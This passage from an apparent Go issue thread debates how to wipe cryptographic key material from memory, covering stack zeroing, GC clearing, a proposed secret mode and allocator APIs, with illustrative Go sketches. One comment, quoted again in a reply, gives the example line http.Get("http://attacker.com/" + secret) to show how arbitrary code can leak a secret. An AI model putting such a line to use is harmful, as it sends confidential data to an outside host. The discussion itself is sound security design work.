I think that the chances that we can correctly implement []sbyte in the compiler, and then maintain that correctness over time, are low. I think it would be rather more likely to make this work in a library. Anything you can write in C you can write in Go using the unsafe package and syscall.Mmap, so if you are confident that this library can be written in C, then it can be written in Go. So perhaps we should be thinking in terms of an API that can implement what is required, rather than trying to apply security requirements to the compiler or the GC.

Comment From: josharian

This is far from my realm of expertise.

But I wonder whether this would be tractable if there was a compiler/runtime mode that aggressively zeroed everything it could. (Copied a goroutine stack? Zero the previous one. Returning from a function? Zero all the stack and registers you used. GC’d some heap space? Zero it. Etc.)

It would be very expensive, much like the spectre mode Russ added. But maybe for security-sensitive uses this would be an acceptable tradeoff.

Comment From: FiloSottile

Rather than throwing shade on one of the most security critical subsystems of the kernel, maybe you should point to real bugs if you see them so that I can fix those bugs. If you find zeroing leaks like that in random.c or its surrounding infrastructure (chacha.c and such), that's something I would really like to know about and fix. I don't take the attitude that, "awww it's too hard to get right, just give up". In the kernel, this is a more tractable problem than in Go.

I'm not throwing shade, I am actually a fan of the current iteration of the random subsystem. I am saying the kernel is a complex beast, and this is a complex task, and as far as I know there is no good way to do regression tests for this, so I don't feel confident in relying on that property. You know PoC||GTFO is not how it works, finding bugs in C is not my skillset. The mocking doesn't help anyone, too.

For years, Go was blocked on generics until some experts came up with something that looked within reach and desirable, and now in retrospect it seems so obvious. With memzeroing, I view us as currently in that preceding stage: not enough current expertise or a spark of an idea to figure how best to implement it.

I like this parallel a lot and was thinking about it earlier. I would add that generics wasn't just the spark of an idea, it was a lot of systematic design and experimentation work. I think you are overall correct. I remain skeptical the average application written in any language achieves the goal it aims for when it zeroes memory (Wireguard software quality is not average even among other cryptographic code), and if we are making significant changes I want them to work for the average application, not just for the most careful ones. Anyway, we agree on the conclusion of where Go is at.

But I wonder whether this would be tractable if there was a compiler/runtime mode that aggressively zeroed everything it could. (Copied a goroutine stack? Zero the previous one. Returning from a function? Zero all the stack and registers you used. GC’d some heap space? Zero it. Etc.)

It would be very expensive, much like the spectre mode Russ added. But maybe for security-sensitive uses this would be an acceptable tradeoff.

Not a bad idea! I don't love the proliferation of "--securer" flags, but Spectre mitigations and this have in common that they are security measures that are very hard to achieve with a more targeted approach, but are necessary only for applications with a specific threat model (for Spectre, applications that run on the same CPU as hostile code, for this, applications that expect their memory to be compromised later and want to defend against it).

How much complexity would that bring into the compiler/runtime, and how likely are we to regress on it (like by adding a new stack copying edge case and forgetting to implement zeroing)?

Comment From: aclements

But I wonder whether this would be tractable if there was a compiler/runtime mode that aggressively zeroed everything it could.

I think this wouldn't be particularly hard. The GC can certainly zero everything it frees. I'm not sure the compiler even needs to be that aggressive about zeroing things on the stack or in registers, since the runtime could zero the unused stack on every scan (which wouldn't be as immediate as every function return, but would be just as immediate as zeroing the heap on free). This would be expensive, but I don't think tremendously so.

Taking this idea and running with it... We've occasionally talked about what "isolates" would look like in Go, usually for resource isolation, crash isolation, or monitoring isolation, and I'm aware of some academic work that added isolates to Go for trusted execution in an enclave. If we did this sort of "global zeroing", one could imagine creating an isolate just for handling key material and enabling zeroing only within that isolate, especially if it's a runtime option. To me, that seems more tractable than trying to do something in the type system, while limiting the cost and being more palatable than a truly global "--securer" flag.

Comment From: randall77

since the runtime could zero the unused stack on every scan (which wouldn't be as immediate as every function return, but would be just as immediate as zeroing the heap on free).

We don't currently know what is unused. The portion of the stack that isn't allocated, sure, but within allocated frames there may be parts that are unused and contain old secrets. We have liveness information only for pointerful values, we'd have to extend the liveness information to all values to zero out unused portions correctly.

Comment From: aclements

We don't currently know what is unused. The portion of the stack that isn't allocated, sure ...

That's true. I only meant the unused portion of the stack, versus every unused stack slot. You're right that that could be hiding key material, and I agree we'd need scalar reachability information to correctly wipe those at GC (at some point this whole approach starts to depend on how good the GC is at minimizing lifetimes). Though perhaps it wouldn't be surprising that key material could remain on the stack if a function that handles key material is on the stack. Some compiler optimizations (inlining) could muddy those waters, though.

Comment From: randall77

The tricky case is we call something that puts secrets on the stack, it returns, then we call something else, and that something else's stack frame has a portion that is never initialized (because its use is guarded by a conditional, or is alignment padding, or whatever).

Comment From: dr2chase

Two ideas:

If a function zeroed its own frame just before returning, that would remove secrets from the stack memory pretty quickly, no special liveness analysis required. How much of the problem would this mitigate? And would most of the benefit come from doing it to important functions, versus doing it for all functions everywhere?

Idea number two, it sounds like doing this in the garbage collector provides a somewhat expensive half-measure. In the usual case, do people know the lifetime of the secret data? I.e., is the problem here that

by default Go says "hmm, looks like it escapes, I'll put that on the heap" even though the person writing the code has a very good idea what the lifetime of the sensitive data should be, or
the programmer says "this is secret stuff, I'm not sure what its lifetime is so it goes on the heap, but once everyone is done with it, I want it wiped."

If it's the first one, I think a library makes more sense, if you can put up with the friction of calling methods to get at the data. The data itself can be specially allocated using whatever mmap works best to avoid the data being paged/swapped to disk, and the Go wrapper object can include a call to wipe it when done, and ALSO have a finalizer that will wipe it if the wipe() call is missed (and maybe to raise some sort of an alert in testing, since this is a late wipe). A targeted compiler option to allow zeroing a particular function's frames might help. Generics might make this a little easier, too -- the library still might need to do unsafe things, but in a more structured way.

If it's the second one, I think we want something a lot more like a more-secure compiler/runtime option where data is aggressively zeroed as soon as we know it isn't useful -- if the sensitive data truly "escapes" to heap, who knows for sure what's sensitive, zero all the things, ASAP.

Comment From: rsc

We can't answer the question "should we do this?" without first answering "what is it we are thinking about doing?" Have we answered the latter question yet?

The original issue was asking for a kind of bzero for internal data structures, but we've identified that that's not good enough because data is copied around by implementations and might be lurking elsewhere. So now we've talked about having a special compiler mode that zeros everything as it dies, to avoid having any kind of special tagging. Sensitive applications would opt into this mode and presumably run a bit slower.

Would that work for your use case @zx2c4? And do we really know all the things that would involve on the compiler and runtime side?

Comment From: zx2c4

Sadly not. If the software is slow, nobody will use it, and it doesn't really matter how many security features it has. The thing needs to still work well.

Basically, I need to be able to zero the stack of crypto-sensitive functions on return, and zero various malloc'd slices when I'm done with them.

Comment From: ianlancetaylor

Providing a function that zeroes a slice, whether heap-allocated or stack-allocated, is easy.

I don't think it would be too hard to add a compiler pragma that directs the function to, as it returns, zero out its own stack frame and all registers. The zeroing would also have to be done when a panic unwinds through the stack frame. The pragma would imply that the function was not inlinable. Of course other functions called by this one would have to use the pragma themselves where appropriate.

I still think that for most people this would be a trap, letting them think that they are getting more security than they actually are. But if people think this would be useful, I'm not going to block it.

Comment From: rsc

Thanks for the reply @zx2c4. It sounds like we need to understand the threat model more. Which of these are important?

being able to zero a heap-allocated slice, array, or struct
being able to mark a heap-allocated slice, array, or struct as "secret".
being able to mark stack-allocated data as "secret"
guaranteeing that any registers that hold data copied from secrets are cleared
guaranteeing that any stack memory that holds data copied from secrets is cleared
guaranteeing that the memory holding secrets is never swapped to disk by the OS

It seems like we know how to do 1 and maybe 2. But the others are more difficult. So is 2 enough? We could plausibly do:

x := new(thing) markSecret(x) copy secrets into x

and at that point markSecret would force it to be heap allocated and arrange for the GC to clear it when collected. Then the only issue is any potential stack copies made (accidentally?) by the program as well as derived data like registers during crypto algorithms. How much do you care about that sort of stuff?

Comment From: rsc

Ping @zx2c4 if you have any input about the questions in the previous comment.

Comment From: vparla

There is truth on both sides of the discussion.

It's certainly true, that a perfect implementation may very well be impractical and/or even technically impossible, like @FiloSottile and others on the Go team are warning. But it is also true that there are steps that can be taken to reduce the risk of sensitive material exposure, a reduction that may turn out significant or even sufficient for most if not all practical purposes, as @magicalo is arguing.

I think it all comes down to damage control, to reducing the risk, even if total elimination is unfeasible. I may be wrong, though, maybe it really makes more sense to do nothing at all; I'm willing to be swayed.

Precisely. This is about narrowing the window of exposure. I concur with @magicalo on that aspect of the problem statement. I also think an explicit type like sbyte that has these secure properties allows a user to understand what they are getting (vs some function that they may or may not call - e.g. runtime.MarkSensitive().)

I also concur with @zx2c4 in terms of PFS and how Go doesn't really allow for truly implementing PFS without adding some ability to do what is being asked here.

We can make perfect the enemy of the good here and do nothing. I would rather have something improved than nothing at all.

Comment From: ianlancetaylor

@vparla I'm not going to argue that we shouldn't do anything in this space.

But when it comes to security there is a real difference between the perfect and the good. A system that is insecure with regard to a particular threat model remains insecure even if you take steps that appear to reduce the risk. In practice there is a very thin line between "I understand exactly what it means to use this feature" and "using this feature will make my system more secure." The former is fine. The latter is actively dangerous, as it leads to a false feeling of security and encourages people to think that they have made the system more secure when in fact they have not affected its security at all. We should strive to only add features that make the system genuinely more secure, and to avoid adding features that appear to reduce risk without eliminating it.

Again, I'm not arguing that we shouldn't do anything. I'm arguing that "it reduces the risk" is not a strong argument for a security feature unless we can reasonably say "it eliminates the risk."

Comment From: rsc

I think we are still waiting on the answers to which of the 6 levels in https://github.com/golang/go/issues/21865#issuecomment-806033088 would be the first useful level for real applications.

@vparla, what does your application strictly need? @zx2c4, yours?

Comment From: rsc

Ping @vparla, @zx2c4 for any comments re what your application needs. (See my previous comment.)

Comment From: vparla

Ping @vparla, @zx2c4 for any comments re what your application needs. (See my previous comment.)

I would like an explicit type(s) that when 'new'd' does the marking for me so that I don't have to do two steps. x := new(thing) <-- this also marks it as secret so I don't have to do it later //alternative x := secretnew(thing)

I would like to explicitly zero-erase an object and not simply rely on a finalizer to do it. (e.g. an option to explicitly erase it).

I would want guarantees that if the runtime moves my object it secure-erases the memory that previously held my object.

being able to zero a heap-allocated slice, array, or struct [MUST] being able to mark a heap-allocated slice, array, or struct as "secret". [MUST] being able to mark stack-allocated data as "secret" [MUST] guaranteeing that any registers that hold data copied from secrets are cleared [NICE TO HAVE] guaranteeing that any stack memory that holds data copied from secrets is cleared [NICE TO HAVE] guaranteeing that the memory holding secrets is never swapped to disk by the OS [NICE TO HAVE]

Comment From: dr2chase

From a compiler-writer's POV, is this the sort of thing that is likely to be confined to a few applications, or likely to happen in a library that is used in a variety of applications? And do these "secret" types implement interfaces in ways that might cause them to land in data structures, or are they pretty much standalone? (I'm trying to imagine some implementation options and problems -- interfaces are a "problem" because now the secret-ness is hidden. Whole-application might be easier because maybe everything just runs in "secret mode" then, i.e., zero everything aggressively.)

Comment From: awnumar

How will existing libraries (for example stdlib crypto libs) be handled? If they perform their own allocations, won't they be incompatible with these changes? Either they'd have to be updated to use whatever "secure" data type is implemented, or there would have to be a variant that accepts pointers to containers that were securely allocated by the caller.

Comment From: rsc

@zx2c4 could use your opinion on https://github.com/golang/go/issues/21865#issuecomment-806033088

Comment From: rsc

@zx2c4 could use your opinion on https://github.com/golang/go/issues/21865#issuecomment-806033088

Comment From: zx2c4

Sorry for the delay @rsc. Answers inline:

being able to zero a heap-allocated slice, array, or struct

Yes.

being able to mark a heap-allocated slice, array, or struct as "secret".

Yes, though it'd probably be enough for this marking to just amount to, "runtime won't copy it elsewhere unless I ask it to." Zeroing it automatically on free would be nice too.

being able to mark stack-allocated data as "secret"

Yes, though I'd be fine with a more manual version of this, in which you just call defer runtime.ClearStack(), and that ensures all stack used by that function and its children is zeroed out. The runtime already keeps track of current stack depth, so this should be a simple memset operation.

guaranteeing that any stack memory that holds data copied from secrets is cleared guaranteeing that any registers that hold data copied from secrets are cleared

I think only insofar as these aren't explicit things that can't be prevented otherwise. For example:

var a [32]byte
copy(a[:], mysecret[:])

I don't think this is a case in which we necessarily need complicated taint analysis. If operations implicitly start copying secrets, then maybe that's a problem, but perhaps that kind of thing would be handled simply by defer runtime.ClearStack().

guaranteeing that the memory holding secrets is never swapped to disk by the OS

Sounds potentially very nasty to do, especially with nested structs, so maybe a bit too ambitious to start with.

It seems like we know how to do 1 and maybe 2. But the others are more difficult. So is 2 enough? We could plausibly do:

x := new(thing) markSecret(x) copy secrets into x and at that point markSecret would force it to be heap allocated and arrange for the GC to clear it when collected.

That sounds very good to me. But...

Then the only issue is any potential stack copies made (accidentally?) by the program as well as derived data like registers during crypto algorithms. How much do you care about that sort of stuff?

This is the remaining piece that's slightly concerning while still being I think something practically solvable. Namely, the defer runtime.ClearStack() idea I had above. This wouldn't be automatic, but it would let me opt into doing that for code like:

func computeHandshakeStuff() SessionKey {
    defer runtime.ClearStack()
    Hash(..., ...)
    Hash(..., ...)
    X25519(..., ...)
    Hash(..., ...)
    Hash(..., ...)
    X25519(..., ...)
    Hash(..., ...)
    Hash(..., ...)
    AEAD(..., ...)
    sessionKey := Hash(..., ...)
    markSecret(sessionKey)
    return sessionKey
}

That's kind of a simplified joke of what a Noise handshake looks like, but it's also not so far off :-P. The idea is that after it returns, all the temporaries that those various crypto functions used get cleared in one fell swoop, and then we simply have the one heap-allocated object that escapes, which is marked as secret.

Taken together, markSecret(...) causing zeroing-on-free and preventing hidden copies, and runtime.ClearStack() clearing intermediates that I've used would give me basically what I'm able to achieve now in C.

I imagine the one complication here is that sometimes the escape analysis isn't perfect, and intermediate functions will wind up letting things escape onto the heap, rather than keeping it on the stack, in which case runtime.ClearStack() won't work as desired. I don't understand the problem space here well enough to have a good solution, though.

Comment From: josharian

@zx2c4 one complication is that stacks can get copied as they grow. So doing runtime.ClearStack on function exit isn’t necessarily enough to clear all copies of the data on the stack that may have been made.

Comment From: zx2c4

Hmm. I guess there could be a prior operation to mark that zero-on-copy there is desired. For example:

func computeHandshakeStuff() SessionKey {
    runtime.MarkSecretStack() // Puts the stack in a "secret mode" in which it's possible to reliably clear it after.
    defer runtime.ClearSecretStack() // Panics or is no-op if `MarkSecretStack` wasn't called prior.
    Hash(..., ...)
    Hash(..., ...)
    X25519(..., ...)
    Hash(..., ...)
    Hash(..., ...)
    X25519(..., ...)
    Hash(..., ...)
    Hash(..., ...)
    AEAD(..., ...)
    sessionKey := Hash(..., ...)
    markSecret(sessionKey)
    return sessionKey
}

Comment From: vparla

Ideally we make this as transparent to the user as possible. The less they have to do, the more likely they will do it correctly. So having an explicit type that has security attributes associated with it would be my preference since the user only needs to create the new type and all the magic happens under the covers. If an explicit runtime call is required to make this work - then lets try to have a few of those as possible to ensure the average coder can do things securely / properly.

Comment From: rsc

OK, so it sounds like it would be enough (if we knew how to implement them) to do:

x := new(thing)
runtime.MarkSecret(x)
copy secrets into x

for heap-allocated things, and then separately to have

runtime.MarkSecretStack()
defer runtime.UnmarkSecretStack()

that can be placed at the top of some crypto operations to make sure arguments and locals that appear on the stack between the two actual calls are not preserved. The pair would let the runtime know enough to deal with stack copies correctly. The Mark/Unmark would nest - one increments the "stack is secret" count and the other decrements it, so that children being called that do a Mark/Unmark pair don't undo the parent's mark.

We could keep a low water mark using the stack growth checks in the main Go toolchain, but it is unclear how to implement the stack operations in gccgo or gollvm. It can probably be done, though.

@zx2c4 Do those two APIs suffice for what you want for Wireguard?

Comment From: randall77

It's not clear to me how to implement MarkSecretStack/UnmarkSecretStack. Let f be the function that calls these two functions.

MarkSecretStack would be easier to implement if it applied only to things subsequently called from f, not to f itself. Having it apply to f itself is tough, because we'd have to zero out the frame from under f while it is still running. Particularly, how do we execute from UnmarkSecretStack to the return point? We still need a valid frame for that.

defer ing UnmarkSecretStack is also problematic on a panic path, as it then runs well down the stack, with all the stuff we'd want to zero in between f and the current execution point (but maybe it's all dead at that point?). What if a subsequent defer in f is recovered?

If the secrecy only applies to things called from f, then I think it's easier to implement. There's some inlining that would have to be disabled, but otherwise I can see how it might work.

Comment From: zx2c4

@zx2c4 Do those two APIs suffice for what you want for Wireguard?

Yes, I think those would be pretty much "good enough", with the big caveat that I'm not totally sure how the UnmarkSecretStack zeroing would work reliably, when it seems like lots of intermediate functions have a tendency of having stack results escape to the heap. But maybe I'm misunderstanding something about escape analysis and it actually wouldn't be a problem? Alternatively, one way to work around this would be to make MarkSecretStack >0 imply that all heap allocations done on that go routine be marked as secret, so in case anything escapes, it's not a problem?

Comment From: ianlancetaylor

What if we say that runtime.MarkSecret does not force the pointer to escape? Do we still need runtime.MarkSecretStack? Or would that be too hard to use correctly?

Comment From: josharian

@ianlancetaylor did you mean "forces" instead of "does not force"? (I think the idea proposed is to keep secret things off of the stack entirely, so zeroing the stack is never necessary.)

Comment From: ianlancetaylor

I actually mean "does not force." I am imagining that the compiler would know about runtime.MarkSecret, and when it sees such a value on the stack it would automatically know that it had to zero the stack frame on function return.

Comment From: josharian

Ah! In that case, it could also know that it had to zero that part of the stack on copy as well, which it could communicate to the runtime…somehow.

Comment From: astrolox

x := new(thing) runtime.MarkSecret(x) copy secrets into x

This makes me wonder; is the place that we're copying from also marked secret? This is to say that for this to be practically useful we'll need to have ways to read from (somewhere) directly into secrets without leaking any of the secret data.

Comment From: FiloSottile

What if we say that runtime.MarkSecret does not force the pointer to escape? Do we still need runtime.MarkSecretStack? Or would that be too hard to use correctly?

If I understand correctly, that would require all variables used by crypto functions to be marked, right? That would be a lot of noise, and require a lot of vigilance in not missing a side-product or intermediate value.

Comment From: zx2c4

Just to summarize where we're at:

MarkSecretStack / UnmarkSecretStack -- when count drops from >0 to 0, the deepest stack is zeroed. MarkSecret(obj) - makes the GC zero the memory on free.

One implementation problem I've brought up with MarkSecretStack / UnmarkSecretStack is that it makes escape logic kind of hard, and lots of functions wind up allocating even if the values are thrown away. A remediation I brought up for this was to have all objects allocated with count>0 be implicitly MarkSecret(obj).

But actually, I wonder if there's a way to simplify this whole thing. Let's get rid of MarkSecret(obj) entirely. If you want to make secrets, you run runtime.PushSecretMode(), and when you're done, you run runtime.PopSecretMode(). When count drops from >0 to 0, the deepest stack used is zeroed as before. And all heap objects that are created with count>0 are marked as secret and will be zeroed when freed. In other words, let's get rid of MarkSecret, and have it always implicit via a better-named function.

The advantage of this? It's much much easier to avoid shooting yourself in the foot or having to reason about escapes and memory. If you're about to ingest or generate or work with some secret data, enable the mode. When you're done, you're done. And when objects created during that era aren't useful anymore, they're zeroed out by the GC. This way, there's never a need to think hard about all the weird intermediate objects, what goes on the stack, what goes on the heap, and so forth. The promise is that any memory writes at all (to stack or to heap) during that era are zeroed when no longer useful. That's a very simple guarantee to understand.

Thoughts?

Comment From: rsc

I don't quite understand how secret mode affects goroutines. The implication here seems to be that you enter secret mode, call arbitrary code, and that code is protected by virtue of being in secret mode, without knowing about secret mode at all. But if that arbitrary code does processing in other goroutines, maybe even pre-established ones, those won't be in secret mode, right? Or does secret mode disallow new goroutines, and channel communication, and maybe sync.Cond and sync.Mutex and sync/atomic too?

It feels like we've had a few plausible ideas, but none of them has stood up to careful scrutiny.

Do other languages with memory management have reasonable answers for this?

Comment From: DmitriyMV

@rsc

But if that arbitrary code does processing in other goroutines, maybe even pre-established ones, those won't be in secret mode, right?

I think that the idea behind SecretMode is that it only ensures that secrets are cleaned up inside current goroutine and nothing else. Everything else made by other goroutines, threads, apps, secrets being stored in files using os package is not covered by this design, nor it should be. I don’t think that any developer will expect SecretMode to work across all goroutines.

We also have something somewhat similar to SecretMode - runtime.LockOSThread which, on goroutine termination, causes thread containing goroutine to exit if runtime.UnlockOSThread wasn’t called.

Comment From: zx2c4

Two approaches:

1) runtime.PushSecretMode() and runtime.PopSecretMode() would be restricted just to the current Go routine. We could add a runtime.IsSecretMode() bool for users who want to manually propagate it to other Go routines. 2) runtime.PushSecretMode() and runtime.PopSecretMode() would be a count for the current Go routine, but if you start a new Go routine when count>0, then the new Go routine starts with count=1.

I keep wavering between 1 and 2. 1 is simpler, but 2 would mean we wouldn't have to care about multiprocessing gotchas (and it seems as though some PQ stuff is sufficiently expensive that threading different parallelizable parts might be desirable).

I don't think it makes sense to have any of this interact with channels or things in the sync package. You can already stupidly copy data to a non secret allocation, just like you could explicitly pass it to a non-secret user through a channel. That seems fine to me and not something we need to get too nervous about or introduce taint analysis. If we go down that route, we'll wind up introducing a whole new type system and things will become woefully complicated.

Comment From: vparla

x := new(thing) runtime.MarkSecret(x)

Why not collapse these into a single call? e.g. x := secretnew(thing)

Comment From: DmitriyMV

Why not collapse these into a single call? e.g. x := secretnew(thing)

new keyword for very specific use case

Comment From: astrolox

Personally I think the runtime.PushSecretMode() and runtime.PopSecretMode() suggestions are a good idea, because I could see myself as enabling it before reading an encrypted file containing my secret, running the decryption and then finally storing the secret value somewhere accessible before disabling it. The result being that everything I did during that time gets securely erased.

That said it seems very easy to use incorrectly with there being lots of ways that the user of the language can accidentally send data out of their little secret session without realising they'll be loosing the protection.

Perhaps writing to a non-secret context (e.g. channels, or copying into already allocated memory, etc.) should be prohibited during secret mode?

Comment From: FiloSottile

The implication here seems to be that you enter secret mode, call arbitrary code, and that code is protected by virtue of being in secret mode, without knowing about secret mode at all.

I don't think that's the goal. Arbitrary code could call http.Get("http://attacker.com/" + secret), after all. The goal is giving cooperating code a chance of protecting a secret without having to be extremely careful about every variable declaration.

Comment From: timothy-king

I don't think that's the goal. Arbitrary code could call http.Get("http://attacker.com/" + secret), after all.

Once the annotations are there, this makes static analysis for such issues much simpler. But that should be at most a side-effect and not a primary concern.

Comment From: rsc

It sounds like MarkSecretStack etc have serious definitional and implementation problems. I don't see a path forward for them. What else is there? Are there any good ideas left?

Java must have this problem. What does Java do for crypto code that wants to do this? Does it just not? And if crypto code in Java does not, then why does Go need to?

Comment From: elagergren-spideroak

Common Criteria requires either:

overwriting the memory with zeros (for (int i = 0; ...), or
destroying the reference (p = null) followed by calling System.gc

That should pass their tests, which include dumping the proc's memory and checking for key material.

Common Criteria, like FIPS, doesn't always require the latest or best coding practices. But it's an indication of what they consider feasible for protecting national security documents.

Comment From: rsc

It may be that we made a wrong turn trying to address the stack. The problem is that the stack secrecy doesn't know which data matters. You end up with an implicit setting that is difficult to propagate and understand. Much as we made context explicit rather than using invisible thread-local storage, we probably should keep secrecy explicit too.

What if we go back to just allocated objects and being able to keep them (1) secret (no implicit copies) and (2) cleared on demand? Then we would only need:

x := secret.New[[32]byte]()
fill x with key material, use it
secret.Clear(&x)

x := secret.Make[[]byte](100)
fill x with key material, use it
secret.Clear(x)

We know how to implement those. And having the special allocators would let us store them in other memory if we wanted to later. And it sounds like Common Criteria would be happy with those. Do we need more than that?

@zx2c4? Anyone else?

Comment From: vparla

@rsc If the user forgets to explicitly call Clear (or a code path results where it is not called), what will happen when the object is eventually destroyed? Will it be treated in a special way by the runtime to securely erase the underlying memory backing it?

Comment From: rsc

@vparla, yes it would be cleared when GC'ed.

Comment From: zx2c4

That seems like a step in the wrong direction. Crypto code is going to use the stack. When I make some ECDH calculation, intermediate steps, and even final results, are written all over the stack. That must be cleaned up. Otherwise, there's no point in any of this. (Not to mention temporary heap escapes, which are their whole own thing in Go.) I'm afraid that trying to mark things at allocation time is a dead end, which doesn't get us any further than just using one of those mmap-wrapper packages.

The beauty of runtime.PushSecretMode() and runtime.PopSecretMode() is that it applies to everything that happens while it's turned on. There aren't gotchas: if it's allocated or written to the stack when secret mode is count>0, then it'll be zeroed on free (or on count==0 for stack). Want a long lived secret? Allocate it while secret mode is on, which will set the marking on the object. Want to read a file through some buffers and store it in that secret? Same thing - enable secret mode, do your file buffering reads, and put the result in some long lived buffer, and pop secret mode.

IOW, I maintain that https://github.com/golang/go/issues/21865#issuecomment-863241270 solves the problem, while a secret.New/Make does not.

Comment From: elagergren-spideroak

I agree with Jason that clearing the stack is an important aspect of key erasure and would similarly be disappointed if it can't or won't be implemented.

But if so, I hope some sort of heap-based clearing (like Russ' secret.New[T] API) isn't forgotten about. For our use cases, it's equally important and is much preferable to using the system's virtual memory allocators.

Comment From: zx2c4

Your desired secret.New API can be trivially implemented as:

runtime.PushSecretMode()
x := new(T)
runtime.PopSecretMode()
return x

But of course you'll want to copy some data into x too.

Comment From: ianlancetaylor

The problem I see with runtime.PushSecretMode is that using it securely requires a very clear understanding of exactly what it does and does not do, an understanding that is not conveyed by the name.

If code carefully uses secret.New for every local variable that holds a part of the secret data, then it seems to me that it can be relatively secure. So when you say that intermediate steps and final results are written all over the stack, do you mean that it is going to be too difficult to use secret.New consistently and securely? Or is it a performance concern? Thanks.

Comment From: elagergren-spideroak

@zx2c4 That was if PushSecretMode is rejected.

Comment From: zx2c4

The problem I see with runtime.PushSecretMode is that using it securely requires a very clear understanding of exactly what it does and does not do, an understanding that is not conveyed by the name.

I'm not wedded to the name. We can fix that. I do think, however, that the semantics provided are the least likely to cause issues and leaks.

If code carefully uses secret.New for every local variable that holds a part of the secret data, then it seems to me that it can be relatively secure.

What about assembly implementations of crypto? What about finely optimized crypto, like that P256 implementation? What about temporary results of an arithmetic expression that the compiler spills to the stack?

So when you say that intermediate steps and final results are written all over the stack, do you mean that it is going to be too difficult to use secret.New consistently and securely? Or is it a performance concern?

Yes, and yes. But moreover, it's simply infeasible to do. You would have to rewrite every single function that's used in the process of getting or deriving a secret.

Comment From: vparla

I agree that both Stack and Heap use cases are important. I would be pleased with either one vs neither one.

Comment From: astrolox

``` x := secret.New[32]byte fill x with key material, use it secret.Clear(&x)

x := secret.Make[]byte fill x with key material, use it secret.Clear(x) ```

I don't see how I would complete the "fill x with key material" step without potentially leaking that key material in some way. I mean the source of the data wouldn't be secret because if it was I wouldn't need this. So without being able to securely fill it, I think this would have limited value.

@rsc How do you propose a fill it securely?

Comment From: rsc

@astrolox, that's a great question and honestly I have no idea. But PushSecretMode/PopSecretMode have exactly the same problem, so I will redirect the question to @zx2c4.

Comment From: rsc

@zx2c4:

I'm not wedded to the name. We can fix that. I do think, however, that the semantics provided are the least likely to cause issues and leaks.

Ian was objecting more to the semantics than the name I think. I don't know that we're even in agreement on what they are. To you, what are the precise semantics provided?

Comment From: elagergren-spideroak

@astrolox No matter the language, I/O is always going to be a problem. If you read bytes from the network they're probably in a kernel buffer somewhere. Or if you read a file. The chat message you type into Signal is probably a SpannableStringBuilder that internally makes copies as needed.

IMO, blocking on this because of I/O is a bit of a distraction. I mean, at the end of the day you're probably gonna display plaintext on the user's screen, right?

Comment From: zx2c4

@astrolox, that's a great question and honestly I have no idea. But PushSecretMode/PopSecretMode have exactly the same problem, so I will redirect the question to @zx2c4.

No, they don't have the same problem:

runtime.PushSecretMode()
key := GenerateRandomKey()
pub := GeneratePubKey(key)
// do some things
longTerm.something = key
runtime.PopSecretMode()

buf := network.ReceivePacket()
parts1, part2 := network.ParsePacket(buf)
reply := make([]byte, 1234)
runtime.PushSecretMode()
output := crypto.DoFancyThings(parts1, parts2, longterm.something)
copy(reply, output.publicReplyPart[:])
longterm.somethingelse = output.somesessionsecret
runtime.PopSecretMode()
network.SendPacket(reply)

Comment From: zx2c4

@zx2c4:

I'm not wedded to the name. We can fix that. I do think, however, that the semantics provided are the least likely to cause issues and leaks.

Ian was objecting more to the semantics than the name I think. I don't know that we're even in agreement on what they are. To you, what are the precise semantics provided?

I've elaborated it a few times in conversation here, but never fully in one place. The closest is here, I guess -- https://github.com/golang/go/issues/21865#issuecomment-863241270 -- so I'll try to do it more clearly now.

Each go routine state object in the runtime maintains a private secretModeCount variable. This is incremented by runtime.PushSecretMode() and decremented by runtime.PopSecretMode(). Those then cause the following two semantics:

Semantic 1. All heap objects allocated when secretModeCount > 0 have a metadata flag set on them called "secure delete" that causes the GC to memzero them when freeing.
Semantic 2. [Option A] When secretModeCount transitions from == 0 to > 0, a new stack is allocated with "secure delete" enabled, and the present one is swapped out, and when secretModeCount transitions from > 0 to == 0, the present stack is swapped out for a new one, without "secure delete" enabled on it.
Semantic 2. [Option B] When secretModeCount transitions from > 0 to == 0, the stack is zeroed.

Options 2A and 2B amount to the same thing semantically and only differ in implementation strategy/optimization.

Then there's the question about Go routine propagation we have to decide on. There are two options for that:

Option α. If a new Go routine is created by a Go routine with secretModeCount > 0, then the new Go routine is created with secretModeCount = 1.
Option β. There is no special handling at all for new Go routine creation. However, we also provide runtime.IsSecretMode() bool that simply returns whether secretModeCount > 0, so that people can do propagation manually if they want.

I can see the arguments for both sides of option α and option β.

Regardless of how we choose for 2A/2B and α/β, the combination of semantics 1 and 2 make it possible to easily do crypto and use Go in a normal natural way, while simply guarding the places that manipulate or allocate secret data with runtime.PushSecretMode() and runtime.PopSecretMode(). Sections of code that are guarded are sure to not leave traces. And if they call into library code while in such a region (such as x/crypto), they keep the same assurances.

On naming, I can see an argument that semantic 2 means "Pop" doesn't quite describe what's happening, and we'd be better off with "Enter" and "Drop" rather than "Push" and "Pop". Or something else. Naming is bikesheddy, but also important for conveying intent, and at the moment, I don't have particularly strong opinions on it. But I do think that semantics 1 and 2, regardless of what they're called, provide some useful assurances.

Comment From: randall77

As I mentioned in https://github.com/golang/go/issues/21865#issuecomment-858004587 , just having {Push/Pop}SecretMode is problematic because we can't reasonably zero the current stack frame on a PopSecretMode.

I think we'd need something like:

func RunUnderSecretMode(f func())

Which does a PushSecretMode-y thing on entry to f and a PopSecretMode-y thing on exit from f (including a panic exit, I guess, although it is less clear how to do that cleanly, unless we squash the panic).

Not sure what would happen to the closure for f and the things it referenced. I think this issue is wanting for some real-world examples of how this would work, so we could see if this would be sufficient. Getting secret args in and secret results out really affects the design.

Comment From: astrolox

No matter the language, I/O is always going to be a problem. If you read bytes from the network they're probably in a kernel buffer somewhere. Or if you read a file. The chat message you type into Signal is probably a SpannableStringBuilder that internally makes copies as needed.

IMO, blocking on this because of I/O is a bit of a distraction. I mean, at the end of the day you're probably gonna display plaintext on the user's screen, right?

@elagergren-spideroak

You're talking about user input such as chat messages, and in that context I agree with you. Even in the context of a user typing their password, I agree with you.

The context of this github issue is for keys. So I'm thinking the secret material which you have stored in encrypted form in a file on your disk. Similar to how SSH stores your private key; for example.

So, assuming that the data in the I/O layer is encrypted; I want a way that I can 1. load the encrypted data in to memory (i.e. I/O) 2. decrypt it into the plaintext I need to protect * 3. store the plaintext in memory for later use * 4. use the plaintext as necessary * and eventually ensure that it is completely forgotten.

Step 1 doesn't need secure erasure. Steps 2, 3, and 4 ideally need a way to ensure that the secret (or part of the secret) that they know is completely forgotten after the program no longer needs it.

The proposal to simply have a secure box only helps with step 3, it doesn't help with steps 2 or 4.

I don't wish to block anything, I just want to make sure we add something that's actually secure and not just going to make people think they're secure when they're not.

Comment From: rsc

